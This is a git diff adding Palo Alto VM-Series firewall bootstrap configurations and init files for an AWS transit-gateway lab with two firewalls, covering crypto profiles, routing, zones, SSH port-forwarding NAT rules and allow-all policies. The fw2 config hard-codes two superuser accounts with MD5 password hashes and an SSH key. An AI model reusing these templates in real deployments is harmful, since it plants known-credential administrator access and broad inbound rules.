+              </entry>
+              <entry name="Suite-B-GCM-128">
+                <encryption>
+                  <member>aes-128-cbc</member>
+                </encryption>
+                <hash>
+                  <member>sha256</member>
+                </hash>
+                <dh-group>
+                  <member>group19</member>
+                </dh-group>
+                <lifetime>
+                  <hours>8</hours>
+                </lifetime>
+              </entry>
+              <entry name="Suite-B-GCM-256">
+                <encryption>
+                  <member>aes-256-cbc</member>
+                </encryption>
+                <hash>
+                  <member>sha384</member>
+                </hash>
+                <dh-group>
+                  <member>group20</member>
+                </dh-group>
+                <lifetime>
+                  <hours>8</hours>
+                </lifetime>
+              </entry>
+              <entry name="aws">
+                <hash>
+                  <member>sha1</member>
+                </hash>
+                <dh-group>
+                  <member>group2</member>
+                </dh-group>
+                <encryption>
+                  <member>aes-128-cbc</member>
+                </encryption>
+                <lifetime>
+                  <seconds>28800</seconds>
+                </lifetime>
+              </entry>
+            </ike-crypto-profiles>
+            <ipsec-crypto-profiles>
+              <entry name="default">
+                <esp>
+                  <encryption>
+                    <member>aes-128-cbc</member>
+                    <member>3des</member>
+                  </encryption>
+                  <authentication>
+                    <member>sha1</member>
+                  </authentication>
+                </esp>
+                <dh-group>group2</dh-group>
+                <lifetime>
+                  <hours>1</hours>
+                </lifetime>
+              </entry>
+              <entry name="Suite-B-GCM-128">
+                <esp>
+                  <encryption>
+                    <member>aes-128-gcm</member>
+                  </encryption>
+                  <authentication>
+                    <member>none</member>
+                  </authentication>
+                </esp>
+                <dh-group>group19</dh-group>
+                <lifetime>
+                  <hours>1</hours>
+                </lifetime>
+              </entry>
+              <entry name="Suite-B-GCM-256">
+                <esp>
+                  <encryption>
+                    <member>aes-256-gcm</member>
+                  </encryption>
+                  <authentication>
+                    <member>none</member>
+                  </authentication>
+                </esp>
+                <dh-group>group20</dh-group>
+                <lifetime>
+                  <hours>1</hours>
+                </lifetime>
+              </entry>
+              <entry name="aws">
+                <esp>
+                  <authentication>
+                    <member>sha1</member>
+                  </authentication>
+                  <encryption>
+                    <member>aes-128-cbc</member>
+                  </encryption>
+                </esp>
+                <lifetime>
+                  <seconds>3600</seconds>
+                </lifetime>
+                <dh-group>group2</dh-group>
+              </entry>
+            </ipsec-crypto-profiles>
+            <global-protect-app-crypto-profiles>
+              <entry name="default">
+                <encryption>
+                  <member>aes-128-cbc</member>
+                </encryption>
+                <authentication>
+                  <member>sha1</member>
+                </authentication>
+              </entry>
+            </global-protect-app-crypto-profiles>
+          </crypto-profiles>
+          <gateway/>
+        </ike>
+        <qos>
+          <profile>
+            <entry name="default">
+              <class>
+                <entry name="class1">
+                  <priority>real-time</priority>
+                </entry>
+                <entry name="class2">
+                  <priority>high</priority>
+                </entry>
+                <entry name="class3">
+                  <priority>high</priority>
+                </entry>
+                <entry name="class4">
+                  <priority>medium</priority>
+                </entry>
+                <entry name="class5">
+                  <priority>medium</priority>
+                </entry>
+                <entry name="class6">
+                  <priority>low</priority>
+                </entry>
+                <entry name="class7">
+                  <priority>low</priority>
+                </entry>
+                <entry name="class8">
+                  <priority>low</priority>
+                </entry>
+              </class>
+            </entry>
+          </profile>
+        </qos>
+        <virtual-router>
+          <entry name="default">
+            <protocol>
+              <bgp>
+                <enable>no</enable>
+                <dampening-profile>
+                  <entry name="default">
+                    <cutoff>1.25</cutoff>
+                    <reuse>0.5</reuse>
+                    <max-hold-time>900</max-hold-time>
+                    <decay-half-life-reachable>300</decay-half-life-reachable>
+                    <decay-half-life-unreachable>900</decay-half-life-unreachable>
+                    <enable>yes</enable>
+                  </entry>
+                </dampening-profile>
+                <routing-options>
+                  <graceful-restart>
+                    <enable>yes</enable>
+                  </graceful-restart>
+                </routing-options>
+                <install-route>no</install-route>
+              </bgp>
+              <rip>
+                <enable>no</enable>
+              </rip>
+              <ospf>
+                <enable>no</enable>
+              </ospf>
+              <ospfv3>
+                <enable>no</enable>
+              </ospfv3>
+            </protocol>
+            <interface>
+              <member>ethernet1/1</member>
+              <member>ethernet1/2</member>
+            </interface>
+            <ecmp>
+              <algorithm>
+                <ip-modulo/>
+              </algorithm>
+            </ecmp>
+            <routing-table>
+              <ip>
+                <static-route>
+                  <entry name="default">
+                    <path-monitor>
+                      <enable>no</enable>
+                      <failure-condition>any</failure-condition>
+                      <hold-time>2</hold-time>
+                    </path-monitor>
+                    <nexthop>
+                      <ip-address>192.168.10.1</ip-address>
+                    </nexthop>
+                    <bfd>
+                      <profile>None</profile>
+                    </bfd>
+                    <interface>ethernet1/1</interface>
+                    <metric>10</metric>
+                    <destination>0.0.0.0/0</destination>
+                    <route-table>
+                      <unicast/>
+                    </route-table>
+                  </entry>
+                  <entry name="spokes">
+                    <path-monitor>
+                      <enable>no</enable>
+                      <failure-condition>any</failure-condition>
+                      <hold-time>2</hold-time>
+                    </path-monitor>
+                    <nexthop>
+                      <ip-address>192.168.20.1</ip-address>
+                    </nexthop>
+                    <bfd>
+                      <profile>None</profile>
+                    </bfd>
+                    <interface>ethernet1/2</interface>
+                    <metric>10</metric>
+                    <destination>10.0.0.0/8</destination>
+                    <route-table>
+                      <unicast/>
+                    </route-table>
+                  </entry>
+                </static-route>
+              </ip>
+            </routing-table>
+          </entry>
+        </virtual-router>
+        <tunnel>
+          <ipsec/>
+        </tunnel>
+      </network>
+      <deviceconfig>
+        <system>
+          <type>
+            <dhcp-client>
+              <send-hostname>yes</send-hostname>
+              <send-client-id>yes</send-client-id>
+              <accept-dhcp-hostname>no</accept-dhcp-hostname>
+              <accept-dhcp-domain>yes</accept-dhcp-domain>
+            </dhcp-client>
+          </type>
+          <update-server>updates.paloaltonetworks.com</update-server>
+          <update-schedule>
+            <threats>
+              <recurring>
+                <weekly>
+                  <day-of-week>wednesday</day-of-week>
+                  <at>01:02</at>
+                  <action>download-only</action>
+                </weekly>
+              </recurring>
+            </threats>
+          </update-schedule>
+          <timezone>America/New_York</timezone>
+          <service>
+            <disable-telnet>yes</disable-telnet>
+            <disable-http>yes</disable-http>
+          </service>
+          <hostname>vmseries-fw1</hostname>
+        </system>
+        <setting>
+          <config>
+            <rematch>yes</rematch>
+          </config>
+          <management>
+            <hostname-type-in-syslog>FQDN</hostname-type-in-syslog>
+            <initcfg>
+              <public-key>c3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCQVFDSWphVDNFbnRlRU80cHFIM09aRnFIOFB6ekFnZmtnNG1yYnNpaWZyZzZDTDJqNjFmbWhIRTFVdjlZalBVRjhJMUhrei9lWGpuMno4Z2ltOEdVcFR1WDExUXhiSmNsM1NLYU51VGxWWVA0VnJvSmJDU3VBVStDdzcyT3haMTN3UVFXa0JzaDRnV05iZ3dnSU1TcURHckYvSlZMV2JxemZDeWFEVmltVVRqdFN4L0NSVDUwbEpqdGR4b2pVdm5mUHZnWXQrVVNBNVpqSExPMDJvY1hZcXBhSEp3UnN5OUo2NGtVcEluRXBKYlFqbXZhajJieVIzb1ZkYzVuVlNsREtvWVlzd1ZNUlZxUXQwNDFYdFhhSm9yZm9SYnF1dmd6Vk1sN2w5V0JWQ2RYOE8rbm9iSHlMT1lZdVBqU05IN1FKZVNPeDJkd1N2ZG9zRmJmZ3ZpUHRjT1QgbXJtLWVhc3R1cy1rZXk=</public-key>
+              <type>
+                <dhcp-client>
+                  <send-hostname>yes</send-hostname>
+                  <send-client-id>yes</send-client-id>
+                  <accept-dhcp-hostname>no</accept-dhcp-hostname>
+                  <accept-dhcp-domain>yes</accept-dhcp-domain>
+                </dhcp-client>
+              </type>
+              <hostname>vmseries-fw1</hostname>
+              <op-command-modes>mgmt-interface-swap</op-command-modes>
+            </initcfg>
+          </management>
+        </setting>
+      </deviceconfig>
+      <vsys>
+        <entry name="vsys1">
+          <application/>
+          <application-group/>
+          <zone>
+            <entry name="untrust-zone">
+              <network>
+                <layer3>
+                  <member>ethernet1/1</member>
+                </layer3>
+              </network>
+            </entry>
+            <entry name="trust-zone">
+              <network>
+                <layer3>
+                  <member>ethernet1/2</member>
+                </layer3>
+              </network>
+            </entry>
+          </zone>
+          <service>
+            <entry name="tcp-1001">
+              <protocol>
+                <tcp>
+                  <port>1001</port>
+                  <override>
+                    <no/>
+                  </override>
+                </tcp>
+              </protocol>
+            </entry>
+            <entry name="tcp-2001">
+              <protocol>
+                <tcp>
+                  <port>2001</port>
+                  <override>
+                    <no/>
+                  </override>
+                </tcp>
+              </protocol>
+            </entry>
+            <entry name="tcp-1002">
+              <protocol>
+                <tcp>
+                  <port>1002</port>
+                  <override>
+                    <no/>
+                  </override>
+                </tcp>
+              </protocol>
+            </entry>
+            <entry name="tcp-2002">
+              <protocol>
+                <tcp>
+                  <port>2002</port>
+                  <override>
+                    <no/>
+                  </override>
+                </tcp>
+              </protocol>
+            </entry>
+          </service>
+          <service-group/>
+          <schedule/>
+          <rulebase>
+            <security>
+              <rules>
+                <entry name="inbound-ssh">
+                  <to>
+                    <member>trust-zone</member>
+                  </to>
+                  <from>
+                    <member>untrust-zone</member>
+                  </from>
+                  <source>
+                    <member>any</member>
+                  </source>
+                  <destination>
+                    <member>any</member>
+                  </destination>
+                  <source-user>
+                    <member>any</member>
+                  </source-user>
+                  <category>
+                    <member>any</member>
+                  </category>
+                  <application>
+                    <member>ssh</member>
+                  </application>
+                  <service>
+                    <member>tcp-1001</member>
+                    <member>tcp-1002</member>
+                    <member>tcp-2001</member>
+                    <member>tcp-2002</member>
+                  </service>
+                  <hip-profiles>
+                    <member>any</member>
+                  </hip-profiles>
+                  <action>allow</action>
+                  <log-start>yes</log-start>
+                </entry>
+                <entry name="spoke1-to-spoke2">
+                  <to>
+                    <member>trust-zone</member>
+                  </to>
+                  <from>
+                    <member>trust-zone</member>
+                  </from>
+                  <source>
+                    <member>any</member>
+                  </source>
+                  <destination>
+                    <member>any</member>
+                  </destination>
+                  <source-user>
+                    <member>any</member>
+                  </source-user>
+                  <category>
+                    <member>any</member>
+                  </category>
+                  <application>
+                    <member>any</member>
+                  </application>
+                  <service>
+                    <member>any</member>
+                  </service>
+                  <hip-profiles>
+                    <member>any</member>
+                  </hip-profiles>
+                  <action>allow</action>
+                </entry>
+                <entry name="outbound">
+                  <to>
+                    <member>untrust-zone</member>
+                  </to>
+                  <from>
+                    <member>trust-zone</member>
+                  </from>
+                  <source>
+                    <member>any</member>
+                  </source>
+                  <destination>
+                    <member>any</member>
+                  </destination>
+                  <source-user>
+                    <member>any</member>
+                  </source-user>
+                  <category>
+                    <member>any</member>
+                  </category>
+                  <application>
+                    <member>any</member>
+                  </application>
+                  <service>
+                    <member>any</member>
+                  </service>
+                  <hip-profiles>
+                    <member>any</member>
+                  </hip-profiles>
+                  <action>allow</action>
+                </entry>
+                <entry name="deny-all">
+                  <to>
+                    <member>any</member>
+                  </to>
+                  <from>
+                    <member>any</member>
+                  </from>
+                  <source>
+                    <member>any</member>
+                  </source>
+                  <destination>
+                    <member>any</member>
+                  </destination>
+                  <source-user>
+                    <member>any</member>
+                  </source-user>
+                  <category>
+                    <member>any</member>
+                  </category>
+                  <application>
+                    <member>any</member>
+                  </application>
+                  <service>
+                    <member>any</member>
+                  </service>
+                  <hip-profiles>
+                    <member>any</member>
+                  </hip-profiles>
+                  <action>deny</action>
+                </entry>
+              </rules>
+            </security>
+            <nat>
+              <rules>
+                <entry name="NAT_OUT">
+                  <source-translation>
+                    <dynamic-ip-and-port>
+                      <interface-address>
+                        <interface>ethernet1/1</interface>
+                      </interface-address>
+                    </dynamic-ip-and-port>
+                  </source-translation>
+                  <to>
+                    <member>untrust-zone</member>
+                  </to>
+                  <from>
+                    <member>trust-zone</member>
+                  </from>
+                  <source>
+                    <member>any</member>
+                  </source>
+                  <destination>
+                    <member>any</member>
+                  </destination>
+                  <service>any</service>
+                </entry>
+                <entry name="NAT_IN_SPOKE1-1">
+                  <to>
+                    <member>untrust-zone</member>
+                  </to>
+                  <from>
+                    <member>untrust-zone</member>
+                  </from>
+                  <source>
+                    <member>any</member>
+                  </source>
+                  <destination>
+                    <member>untrust-fw1</member>
+                  </destination>
+                  <service>tcp-1001</service>
+                  <source-translation>
+                    <dynamic-ip-and-port>
+                      <interface-address>
+                        <interface>ethernet1/2</interface>
+                      </interface-address>
+                    </dynamic-ip-and-port>
+                  </source-translation>
+                  <destination-translation>
+                    <translated-port>22</translated-port>
+                    <translated-address>10.1.0.4</translated-address>
+                  </destination-translation>
+                  <to-interface>any</to-interface>
+                </entry>
+                <entry name="NAT_IN_SPOKE1-2">
+                  <to>
+                    <member>untrust-zone</member>
+                  </to>
+                  <from>
+                    <member>untrust-zone</member>
+                  </from>
+                  <source>
+                    <member>any</member>
+                  </source>
+                  <destination>
+                    <member>untrust-fw1</member>
+                  </destination>
+                  <service>tcp-1002</service>
+                  <source-translation>
+                    <dynamic-ip-and-port>
+                      <interface-address>
+                        <interface>ethernet1/2</interface>
+                      </interface-address>
+                    </dynamic-ip-and-port>
+                  </source-translation>
+                  <destination-translation>
+                    <translated-port>22</translated-port>
+                    <translated-address>10.1.1.4</translated-address>
+                  </destination-translation>
+                </entry>
+                <entry name="NAT_IN_SPOKE2-1">
+                  <to>
+                    <member>untrust-zone</member>
+                  </to>
+                  <from>
+                    <member>untrust-zone</member>
+                  </from>
+                  <source>
+                    <member>any</member>
+                  </source>
+                  <destination>
+                    <member>untrust-fw1</member>
+                  </destination>
+                  <service>tcp-2001</service>
+                  <source-translation>
+                    <dynamic-ip-and-port>
+                      <interface-address>
+                        <interface>ethernet1/2</interface>
+                      </interface-address>
+                    </dynamic-ip-and-port>
+                  </source-translation>
+                  <destination-translation>
+                    <translated-port>22</translated-port>
+                    <translated-address>10.2.0.4</translated-address>
+                  </destination-translation>
+                </entry>
+                <entry name="NAT_IN_SPOKE2-2">
+                  <to>
+                    <member>untrust-zone</member>
+                  </to>
+                  <from>
+                    <member>untrust-zone</member>
+                  </from>
+                  <source>
+                    <member>any</member>
+                  </source>
+                  <destination>
+                    <member>untrust-fw1</member>
+                  </destination>
+                  <service>tcp-2002</service>
+                  <source-translation>
+                    <dynamic-ip-and-port>
+                      <interface-address>
+                        <interface>ethernet1/2</interface>
+                      </interface-address>
+                    </dynamic-ip-and-port>
+                  </source-translation>
+                  <destination-translation>
+                    <translated-port>22</translated-port>
+                    <translated-address>10.2.1.4</translated-address>
+                  </destination-translation>
+                </entry>
+              </rules>
+            </nat>
+            <default-security-rules>
+              <rules>
+                <entry name="intrazone-default">
+                  <action>allow</action>
+                  <log-start>no</log-start>
+                  <log-end>yes</log-end>
+                </entry>
+                <entry name="interzone-default">
+                  <action>deny</action>
+                  <log-start>no</log-start>
+                  <log-end>yes</log-end>
+                </entry>
+              </rules>
+            </default-security-rules>
+          </rulebase>
+          <import>
+            <network>
+              <interface>
+                <member>ethernet1/1</member>
+                <member>ethernet1/2</member>
+              </interface>
+            </network>
+          </import>
+          <address>
+            <entry name="untrust-fw1">
+              <ip-netmask>192.168.10.4</ip-netmask>
+            </entry>
+          </address>
+          <tag>
+            <entry name="untrust-zone">
+              <color>color6</color>
+            </entry>
+            <entry name="trust-zone">
+              <color>color13</color>
+            </entry>
+          </tag>
+        </entry>
+      </vsys>
+    </entry>
+  </devices>
+</config>
diff --git a/aws/tgw_2fw_vpc_insertion/bootstrap_files/fw1/init-cfg.txt b/aws/tgw_2fw_vpc_insertion/bootstrap_files/fw1/init-cfg.txt
new file mode 100644
index 00000000..968814f6
--- /dev/null
+++ b/aws/tgw_2fw_vpc_insertion/bootstrap_files/fw1/init-cfg.txt
@@ -0,0 +1,18 @@
+type=dhcp-client
+ip-address=
+default-gateway=
+netmask=
+ipv6-address=
+ipv6-default-gateway=
+hostname=vmseries-fw1
+panorama-server=
+panorama-server-2=
+tplname=
+dgname=
+dns-primary=
+dns-secondary=
+op-command-modes=mgmt-interface-swap
+dhcp-send-hostname=yes
+dhcp-send-client-id=yes
+dhcp-accept-server-hostname=no
+dhcp-accept-server-domain=yes
diff --git a/aws/tgw_2fw_vpc_insertion/bootstrap_files/fw2/authcodes b/aws/tgw_2fw_vpc_insertion/bootstrap_files/fw2/authcodes
new file mode 100644
index 00000000..8b137891
--- /dev/null
+++ b/aws/tgw_2fw_vpc_insertion/bootstrap_files/fw2/authcodes
@@ -0,0 +1 @@
+
diff --git a/aws/tgw_2fw_vpc_insertion/bootstrap_files/fw2/bootstrap.xml b/aws/tgw_2fw_vpc_insertion/bootstrap_files/fw2/bootstrap.xml
new file mode 100644
index 00000000..32e7d2e8
--- /dev/null
+++ b/aws/tgw_2fw_vpc_insertion/bootstrap_files/fw2/bootstrap.xml
@@ -0,0 +1,821 @@
+<?xml version="1.0"?>
+<config urldb="paloaltonetworks" version="8.1.0">
+  <mgt-config>
+    <users>
+      <entry name="admin">
+        <phash>$1$gyvolqhn$qTxyak3dNrZGte6mj5znJ.</phash>
+        <permissions>
+          <role-based>
+            <superuser>yes</superuser>
+          </role-based>
+        </permissions>
+        <public-key>c3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCQVFDSWphVDNFbnRlRU80cHFIM09aRnFIOFB6ekFnZmtnNG1yYnNpaWZyZzZDTDJqNjFmbWhIRTFVdjlZalBVRjhJMUhrei9lWGpuMno4Z2ltOEdVcFR1WDExUXhiSmNsM1NLYU51VGxWWVA0VnJvSmJDU3VBVStDdzcyT3haMTN3UVFXa0JzaDRnV05iZ3dnSU1TcURHckYvSlZMV2JxemZDeWFEVmltVVRqdFN4L0NSVDUwbEpqdGR4b2pVdm5mUHZnWXQrVVNBNVpqSExPMDJvY1hZcXBhSEp3UnN5OUo2NGtVcEluRXBKYlFqbXZhajJieVIzb1ZkYzVuVlNsREtvWVlzd1ZNUlZxUXQwNDFYdFhhSm9yZm9SYnF1dmd6Vk1sN2w5V0JWQ2RYOE8rbm9iSHlMT1lZdVBqU05IN1FKZVNPeDJkd1N2ZG9zRmJmZ3ZpUHRjT1QgbXJtLWVhc3R1cy1rZXk=</public-key>
+      </entry>
+      <entry name="paloalto">
+        <permissions>
+          <role-based>
+            <superuser>yes</superuser>
+          </role-based>
+        </permissions>
+        <phash>$1$lfqxgvff$AYLGhPFeBO8CyXTeBaqEg.</phash>
+      </entry>
+    </users>
+  </mgt-config>
+  <shared>
+    <application/>
+    <application-group/>
+    <service/>
+    <service-group/>
+    <botnet>
+      <configuration>
+        <http>
+          <dynamic-dns>
+            <enabled>yes</enabled>
+            <threshold>5</threshold>
+          </dynamic-dns>
+          <malware-sites>
+            <enabled>yes</enabled>
+            <threshold>5</threshold>
+          </malware-sites>
+          <recent-domains>
+            <enabled>yes</enabled>
+            <threshold>5</threshold>
+          </recent-domains>
+          <ip-domains>
+            <enabled>yes</enabled>
+            <threshold>10</threshold>
+          </ip-domains>
+          <executables-from-unknown-sites>
+            <enabled>yes</enabled>
+            <threshold>5</threshold>
+          </executables-from-unknown-sites>
+        </http>
+        <other-applications>
+          <irc>yes</irc>
+        </other-applications>
+        <unknown-applications>
+          <unknown-tcp>
+            <destinations-per-hour>10</destinations-per-hour>
+            <sessions-per-hour>10</sessions-per-hour>
+            <session-length>
+              <maximum-bytes>100</maximum-bytes>
+              <minimum-bytes>50</minimum-bytes>
+            </session-length>
+          </unknown-tcp>
+          <unknown-udp>
+            <destinations-per-hour>10</destinations-per-hour>
+            <sessions-per-hour>10</sessions-per-hour>
+            <session-length>
+              <maximum-bytes>100</maximum-bytes>
+              <minimum-bytes>50</minimum-bytes>
+            </session-length>
+          </unknown-udp>
+        </unknown-applications>
+      </configuration>
+      <report>
+        <topn>100</topn>
+        <scheduled>yes</scheduled>
+      </report>
+    </botnet>
+    <content-preview>
+      <application/>
+      <application-type>
+        <category/>
+        <technology/>
+      </application-type>
+    </content-preview>
+  </shared>
+  <devices>
+    <entry name="localhost.localdomain">
+      <network>
+        <interface>
+          <ethernet>
+            <entry name="ethernet1/1">
+              <layer3>
+                <ipv6>
+                  <neighbor-discovery>
+                    <router-advertisement>
+                      <enable>no</enable>
+                    </router-advertisement>
+                  </neighbor-discovery>
+                </ipv6>
+                <ndp-proxy>
+                  <enabled>no</enabled>
+                </ndp-proxy>
+                <lldp>
+                  <enable>no</enable>
+                </lldp>
+                <dhcp-client/>
+              </layer3>
+            </entry>
+            <entry name="ethernet1/2">
+              <layer3>
+                <ipv6>
+                  <neighbor-discovery>
+                    <router-advertisement>
+                      <enable>no</enable>
+                    </router-advertisement>
+                  </neighbor-discovery>
+                </ipv6>
+                <ndp-proxy>
+                  <enabled>no</enabled>
+                </ndp-proxy>
+                <dhcp-client>
+                  <create-default-route>no</create-default-route>
+                </dhcp-client>
+                <lldp>
+                  <enable>no</enable>
+                </lldp>
+                <interface-management-profile>allow-lambda</interface-management-profile>
+              </layer3>
+            </entry>
+          </ethernet>
+          <tunnel>
+            <units/>
+          </tunnel>
+        </interface>
+        <profiles>
+          <monitor-profile>
+            <entry name="default">
+              <interval>3</interval>
+              <threshold>5</threshold>
+              <action>wait-recover</action>
+            </entry>
+          </monitor-profile>
+          <interface-management-profile>
+            <entry name="allow-lambda">
+              <https>yes</https>
+            </entry>
+          </interface-management-profile>
+        </profiles>
+        <ike>
+          <crypto-profiles>
+            <ike-crypto-profiles>
+              <entry name="default">
+                <encryption>
+                  <member>aes-128-cbc</member>
+                  <member>3des</member>
+                </encryption>
+                <hash>
+                  <member>sha1</member>
+                </hash>
+                <dh-group>
+                  <member>group2</member>
+                </dh-group>
+                <lifetime>
+                  <hours>8</hours>
+                </lifetime>
+              </entry>
+              <entry name="Suite-B-GCM-128">
+                <encryption>
+                  <member>aes-128-cbc</member>
+                </encryption>
+                <hash>
+                  <member>sha256</member>
+                </hash>
+                <dh-group>
+                  <member>group19</member>
+                </dh-group>
+                <lifetime>
+                  <hours>8</hours>
+                </lifetime>
+              </entry>
+              <entry name="Suite-B-GCM-256">
+                <encryption>
+                  <member>aes-256-cbc</member>
+                </encryption>
+                <hash>
+                  <member>sha384</member>
+                </hash>
+                <dh-group>
+                  <member>group20</member>
+                </dh-group>
+                <lifetime>
+                  <hours>8</hours>
+                </lifetime>
+              </entry>
+              <entry name="aws">
+                <hash>
+                  <member>sha1</member>
+                </hash>
+                <dh-group>
+                  <member>group2</member>
+                </dh-group>
+                <encryption>
+                  <member>aes-128-cbc</member>
+                </encryption>
+                <lifetime>
+                  <seconds>28800</seconds>
+                </lifetime>
+              </entry>
+            </ike-crypto-profiles>
+            <ipsec-crypto-profiles>
+              <entry name="default">
+                <esp>
+                  <encryption>
+                    <member>aes-128-cbc</member>
+                    <member>3des</member>
+                  </encryption>
+                  <authentication>
+                    <member>sha1</member>
+                  </authentication>
+                </esp>
+                <dh-group>group2</dh-group>
+                <lifetime>
+                  <hours>1</hours>
+                </lifetime>
+              </entry>
+              <entry name="Suite-B-GCM-128">
+                <esp>
+                  <encryption>
+                    <member>aes-128-gcm</member>
+                  </encryption>
+                  <authentication>
+                    <member>none</member>
+                  </authentication>
+                </esp>
+                <dh-group>group19</dh-group>
+                <lifetime>
+                  <hours>1</hours>
+                </lifetime>
+              </entry>
+              <entry name="Suite-B-GCM-256">
+                <esp>
+                  <encryption>
+                    <member>aes-256-gcm</member>
+                  </encryption>
+                  <authentication>
+                    <member>none</member>
+                  </authentication>
+                </esp>
+                <dh-group>group20</dh-group>
+                <lifetime>
+                  <hours>1</hours>
+                </lifetime>
+              </entry>
+              <entry name="aws">
+                <esp>
+                  <authentication>
+                    <member>sha1</member>
+                  </authentication>
+                  <encryption>
+                    <member>aes-128-cbc</member>
+                  </encryption>
+                </esp>
+                <lifetime>
+                  <seconds>3600</seconds>
+                </lifetime>
+                <dh-group>group2</dh-group>
+              </entry>
+            </ipsec-crypto-profiles>
+            <global-protect-app-crypto-profiles>
+              <entry name="default">
+                <encryption>
+                  <member>aes-128-cbc</member>
+                </encryption>
+                <authentication>
+                  <member>sha1</member>
+                </authentication>
+              </entry>
+            </global-protect-app-crypto-profiles>
+          </crypto-profiles>
+          <gateway/>
+        </ike>
+        <qos>
+          <profile>
+            <entry name="default">
+              <class>
+                <entry name="class1">
+                  <priority>real-time</priority>
+                </entry>
+                <entry name="class2">
+                  <priority>high</priority>
+                </entry>
+                <entry name="class3">
+                  <priority>high</priority>
+                </entry>
+                <entry name="class4">
+                  <priority>medium</priority>
+                </entry>
+                <entry name="class5">
+                  <priority>medium</priority>
+                </entry>
+                <entry name="class6">
+                  <priority>low</priority>
+                </entry>
+                <entry name="class7">
+                  <priority>low</priority>
+                </entry>
+                <entry name="class8">
+                  <priority>low</priority>
+                </entry>
+              </class>
+            </entry>
+          </profile>
+        </qos>
+        <virtual-router>
+          <entry name="default">
+            <protocol>
+              <bgp>
+                <enable>no</enable>
+                <dampening-profile>
+                  <entry name="default">
+                    <cutoff>1.25</cutoff>
+                    <reuse>0.5</reuse>
+                    <max-hold-time>900</max-hold-time>
+                    <decay-half-life-reachable>300</decay-half-life-reachable>
+                    <decay-half-life-unreachable>900</decay-half-life-unreachable>
+                    <enable>yes</enable>
+                  </entry>
+                </dampening-profile>
+                <routing-options>
+                  <graceful-restart>
+                    <enable>yes</enable>
+                  </graceful-restart>
+                </routing-options>
+                <install-route>no</install-route>
+              </bgp>
+              <rip>
+                <enable>no</enable>
+              </rip>
+              <ospf>
+                <enable>no</enable>
+              </ospf>
+              <ospfv3>
+                <enable>no</enable>
+              </ospfv3>
+            </protocol>
+            <interface>
+              <member>ethernet1/1</member>
+              <member>ethernet1/2</member>
+            </interface>
+            <ecmp>
+              <algorithm>
+                <ip-modulo/>
+              </algorithm>
+            </ecmp>
+            <routing-table>
+              <ip>
+                <static-route>
+                  <entry name="default">
+                    <nexthop>
+                      <ip-address>192.168.11.1</ip-address>
+                    </nexthop>
+                    <bfd>
+                      <profile>None</profile>
+                    </bfd>
+                    <path-monitor>
+                      <enable>no</enable>
+                      <failure-condition>any</failure-condition>
+                      <hold-time>2</hold-time>
+                    </path-monitor>
+                    <interface>ethernet1/1</interface>
+                    <metric>10</metric>
+                    <destination>0.0.0.0/0</destination>
+                    <route-table>
+                      <unicast/>
+                    </route-table>
+                  </entry>
+                  <entry name="spokes">
+                    <nexthop>
+                      <ip-address>192.168.21.1</ip-address>
+                    </nexthop>
+                    <bfd>
+                      <profile>None</profile>
+                    </bfd>
+                    <path-monitor>
+                      <enable>no</enable>
+                      <failure-condition>any</failure-condition>
+                      <hold-time>2</hold-time>
+                    </path-monitor>
+                    <interface>ethernet1/2</interface>
+                    <metric>10</metric>
+                    <destination>10.0.0.0/8</destination>
+                    <route-table>
+                      <unicast/>
+                    </route-table>
+                  </entry>
+                </static-route>
+              </ip>
+            </routing-table>
+          </entry>
+        </virtual-router>
+        <tunnel>
+          <ipsec/>
+        </tunnel>
+      </network>
+      <deviceconfig>
+        <system>
+          <type>
+            <dhcp-client>
+              <send-hostname>yes</send-hostname>
+              <send-client-id>yes</send-client-id>
+              <accept-dhcp-hostname>no</accept-dhcp-hostname>
+              <accept-dhcp-domain>yes</accept-dhcp-domain>
+            </dhcp-client>
+          </type>
+          <update-server>updates.paloaltonetworks.com</update-server>
+          <update-schedule>
+            <threats>
+              <recurring>
+                <weekly>
+                  <day-of-week>wednesday</day-of-week>
+                  <at>01:02</at>
+                  <action>download-only</action>
+                </weekly>
+              </recurring>
+            </threats>
+          </update-schedule>
+          <timezone>America/New_York</timezone>
+          <service>
+            <disable-telnet>yes</disable-telnet>
+            <disable-http>yes</disable-http>
+          </service>
+          <hostname>vmseries-fw2</hostname>
+        </system>
+        <setting>
+          <config>
+            <rematch>yes</rematch>
+          </config>
+          <management>
+            <hostname-type-in-syslog>FQDN</hostname-type-in-syslog>
+            <initcfg>
+              <public-key>c3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCQVFDSWphVDNFbnRlRU80cHFIM09aRnFIOFB6ekFnZmtnNG1yYnNpaWZyZzZDTDJqNjFmbWhIRTFVdjlZalBVRjhJMUhrei9lWGpuMno4Z2ltOEdVcFR1WDExUXhiSmNsM1NLYU51VGxWWVA0VnJvSmJDU3VBVStDdzcyT3haMTN3UVFXa0JzaDRnV05iZ3dnSU1TcURHckYvSlZMV2JxemZDeWFEVmltVVRqdFN4L0NSVDUwbEpqdGR4b2pVdm5mUHZnWXQrVVNBNVpqSExPMDJvY1hZcXBhSEp3UnN5OUo2NGtVcEluRXBKYlFqbXZhajJieVIzb1ZkYzVuVlNsREtvWVlzd1ZNUlZxUXQwNDFYdFhhSm9yZm9SYnF1dmd6Vk1sN2w5V0JWQ2RYOE8rbm9iSHlMT1lZdVBqU05IN1FKZVNPeDJkd1N2ZG9zRmJmZ3ZpUHRjT1QgbXJtLWVhc3R1cy1rZXk=</public-key>
+              <type>
+                <dhcp-client>
+                  <send-hostname>yes</send-hostname>
+                  <send-client-id>yes</send-client-id>
+                  <accept-dhcp-hostname>no</accept-dhcp-hostname>
+                  <accept-dhcp-domain>yes</accept-dhcp-domain>
+                </dhcp-client>
+              </type>
+              <hostname>vmseries-fw2</hostname>
+              <op-command-modes>mgmt-interface-swap</op-command-modes>
+            </initcfg>
+          </management>
+        </setting>
+      </deviceconfig>
+      <vsys>
+        <entry name="vsys1">
+          <application/>
+          <application-group/>
+          <zone>
+            <entry name="untrust-zone">
+              <network>
+                <layer3>
+                  <member>ethernet1/1</member>
+                </layer3>
+              </network>
+            </entry>
+            <entry name="trust-zone">
+              <network>
+                <layer3>
+                  <member>ethernet1/2</member>
+                </layer3>
+              </network>
+            </entry>
+          </zone>
+          <service>
+            <entry name="tcp-1001">
+              <protocol>
+                <tcp>
+                  <port>1001</port>
+                  <override>
+                    <no/>
+                  </override>
+                </tcp>
+              </protocol>
+            </entry>
+            <entry name="tcp-2001">
+              <protocol>
+                <tcp>
+                  <port>2001</port>
+                  <override>
+                    <no/>
+                  </override>
